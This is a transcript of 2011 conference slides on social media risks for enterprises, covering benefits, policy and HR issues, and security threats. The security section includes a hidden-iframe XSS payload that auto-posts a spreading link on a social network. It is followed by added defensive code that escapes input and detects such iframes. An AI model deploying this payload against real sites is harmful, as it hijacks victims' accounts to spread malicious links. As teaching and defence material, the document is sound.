This presentation was given on June 27th at the 2011 MidTech IT Summit at the Red Rock Resort/Casino in Las Vegas, NV.
SOCIAL MEDIA: INFILTRATING THE ENTERPRISE
MIDTECH IT Summit June 27th, 2011
JAY A. MCLAUGHLIN, CISSP SVP, CHIEF INFORMATION OFFICER
DISCLAIMER The materials, thoughts, comments, ideas and opinions expressed throughout this presentation are entirely my own and do not necessarily represent the thoughts or opinions of my employer (past or present).
AGENDA
• Defining social media
• Embracing the Inevitable
• Understanding the Benefits & Risks
• Friending your Customers
• Preventing social media disasters
• Building a strategy
Social media: forms of electronic communication (as Web sites for social networking and microblogging) through which users create online communities to share information, ideas, personal messages, and other content
Social media is media for social interaction using highly accessible and scalable communication techniques. Social media is the use of web-based and mobile technologies to turn communication into interactive dialogue.
What is Social Media?
• 500 Million • 250 Million • 700 Billion
Source: Facebook.com April 2011
It’s Corporate
• 6939 • 319 • 140 Million
Source: Twitter. com March 2011
It’s Mainstream
• 100 Million • 2 Million • 4.3 Billion
Source: LinkedIn.com May 2011
WHY SHOULD WE CARE?
• It's where your customers are
• It's where your prospects are
• Its reach stretches further and broader than any other marketing channel
• It's relevant to be in the game
“We don’t have a choice on whether we will DO
social media, the question is how WELL we DO it.”
- Erik Qualman, author of Socialnomics
http://www.youtube.com/user/Socialnomics09?blend=1&ob=5
Source: eMarketer, Nov 2010
* companies that have 100 or more employees
BUSINESS BENEFITS
Enhanced Collaboration
Shared Workspaces
Faster access to Information
Extended Organizational Reach
Ability to Compete
THE EQUALIZER
• When leveraged effectively, social networks become an equalizer, leveling the playing field
• They allow organizations both large and small to compete and be relevant in their space
• Ability to influence at little or no cost
UNANTICIPATED DISASTERS
PREVENTING DISASTERS
IS YOUR ORGANIZATION PREPARED FOR...?
• Employees posting opinions about the organization
• Managing brand reputation and public opinion/exposure
• Responding to positive and negative feedback from customers
• Standing by the decision NOT to get engaged....?
SOCIAL MEDIA SWOT
• Strength - ability to build relationships with your target audience like never before.
• Weakness - siloed as a business function and not integrated into the overall business strategy.
• Threat - fear of losing control. Seeks risk aversion. Non-innovative.
• Opportunities - it's where our customers are. Integration with the business is key.
ESTABLISHING A POLICY
THE BASICS
• Do your employees know what is acceptable or permitted?
• How may (or may not) employees identify themselves?
• To what degree can corporate content be used?
• Has your organization determined what it can do with information obtained through social media?
Establishing a policy is critical!
• Governance is required to implement and enforce an acceptable usage policy covering social networking sites
• It is key that all staff receive security awareness training covering your acceptable usage policy for social networking
• Promote good practices to help improve users' behavior, ultimately reducing and/or mitigating some of the risks
• Permit access to social networking sites only where there is an obvious business benefit, and only to users with a business need
ESTABLISH A STRATEGY
• Institute processes to manage and monitor activity
• Be flexible - there is overall uncertainty about which strategies and tactics to adopt to secure social media
• Understand and identify which users create the most risk
• Create reasonable guidelines that can be followed
• Review each site's terms and conditions to understand the risks associated with it
ESTABLISH A STRATEGY
REGULATION is coming
For regulated industries, what requirements do you face?
ex. FINRA
Employers know A LOT about their employees/candidates
• HR is tempted to "peek" at these sites to gather information about employees and potential candidates
• Consider discrimination lawsuits! Proceed with caution. - ex: viewing the online photo/picture of a candidate
• Consistency is KING - it will minimize your risk.
- ex: if conducting a search for ONE candidate, then do so for ALL
• Even if employers have the technical capability to gain access to social networking information of their employees or candidates, it does not imply the legal right to do so.
HR: OBTAINING INFORMATION FROM SOCIAL NETWORKS
consider ALL risks
Is there a need to address how to evaluate the risk of sharing too much information online in relation to the value it brings to the business?
• There is a continued growth in social networking sites being used as an attack distribution platform
• Users are less likely to suspect malware when it is passed on by a friend, since it carries a certain level of authenticity and trust
• Social networks give attackers a potentially powerful point of leverage, sometimes allowing them to launch sophisticated attacks against businesses
• Known weaknesses exist in the security of the networks themselves, which limit our control
Security Concerns
• Session-hijacking / authentication weaknesses
• Profile harvesting leading to social engineering - ex: phishing / spear-phishing
• Cross-site scripting (XSS) / Cross-site request forgery (CSRF)
• Malicious code / Malware - ex: drive-by downloads
“Threatscape” of sites
<iframe id="CrazyDaVinci" style="display:none;" src="http://m.facebook.com/connect/prompt_feed.php?display=wap&user_message_prompt='<script>window.onload=function(){document.forms[0].message.value='Just visited http://y.ahoo.it/gajeBA Wow.. cool! nice page dude!!!';document.forms[0].submit();}</script>"></iframe>
• This bit of HTML/JavaScript would be included in a viral page.
• The code sets the content of the wall post to a message that includes a link to the viral page, then submits the prompt automatically.
XSS Example
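As an added illustration (not code from the slides), the hidden-iframe trick above depends on the framed page reflecting its prompt parameter into the form unescaped. The block below shows that vulnerable render beside a hardened one, and a scan that flags hidden iframes carrying script in their query string; the host, path and sample markup are constructed placeholders, not a claim about any live site.

```javascript
// Added example, not code from the original slides. The iframe on the slide
// only works because the framed page copies its "user_message_prompt" query
// parameter into the form unescaped (reflected XSS). Shown here: that
// vulnerable render, the hardened render, and a defender-side scan that flags
// hidden iframes whose query string carries script.

// Constructed sample modelled on the slide's markup; host and path are
// placeholders, not a claim about any live site.
const SAMPLE_HTML =
  '<p>Nice page!</p>' +
  '<iframe id="CrazyDaVinci" style="display:none;" ' +
  'src="https://social.example/prompt_feed.php?display=wap&user_message_prompt=' +
  encodeURIComponent("'<script>document.forms[0].submit();</script>") +
  '"></iframe>';

// Vulnerable: the parameter is dropped straight into the page.
function renderPromptVulnerable(prompt) {
  return `<form><textarea name="message">${prompt}</textarea></form>`;
}

// Hardened: HTML-encode before interpolating into element content, so
// "<script>" reaches the browser as text, never as markup.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}
function renderPromptHardened(prompt) {
  return `<form><textarea name="message">${escapeHtml(prompt)}</textarea></form>`;
}

// Detection: report iframes whose src has a query parameter that decodes to
// script, and note whether the frame is hidden (the viral-page pattern).
const SCRIPT_MARKER = /<script|javascript:|\bon\w+\s*=/i;
function findSuspiciousIframes(html) {
  const findings = [];
  const iframeRe = /<iframe\b([^>]*)>/gi;
  let m;
  while ((m = iframeRe.exec(html)) !== null) {
    const attrs = m[1];
    const src = (attrs.match(/\bsrc\s*=\s*"([^"]*)"/i) || [])[1];
    if (!src) continue;
    let url;
    try { url = new URL(src); } catch (e) { continue; }
    const hidden = /display\s*:\s*none/i.test(attrs);
    for (const [name, value] of url.searchParams) {
      if (SCRIPT_MARKER.test(value)) findings.push({ src, param: name, hidden });
    }
  }
  return findings;
}
```

Running `findSuspiciousIframes` over page HTML before it is published, or over proxied responses, surfaces the pattern; the hardened render is what the framed site needs so the parameter can never execute.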
Microsoft has documented a steady rise in the number of attacks targeting social networks
Primary vectors:
• Phishing attempts
• Social engineering tactics
Instances of phishing impressions increased from 8.3% to 84.5%
Verizon highlighted in its 2011 DBIR that malware and social engineering were the culprits behind 60% of all reported attacks/breaches
Contribution of malware:
• 49% of breaches
• 79% of records stolen
PROTECT & SERVE
Policing Social Media: How do we protect the usage of social networks?
• Is it possible to establish and implement a standard set of guidelines for enterprise users?
• ...that would help to not only prevent data leaks, but also keep emerging social networking malware at bay?
• It requires a combination of technical, behavioral and organizational security controls
“Policing” Social Media
• Social media isn't a choice anymore....recognize it is a business transformation tool
• Perform a comprehensive risk assessment against all social networks that will be considered for use
• Social networks DO introduce new security risks - take a formal approach to mitigate them through policy enforcement and user education
• Doing nothing is not an option...will you take that risk?
CONCLUSION
QUESTIONS?
Contact Info:
@jaymclaughlin
linkedin.com/jaymclaughlin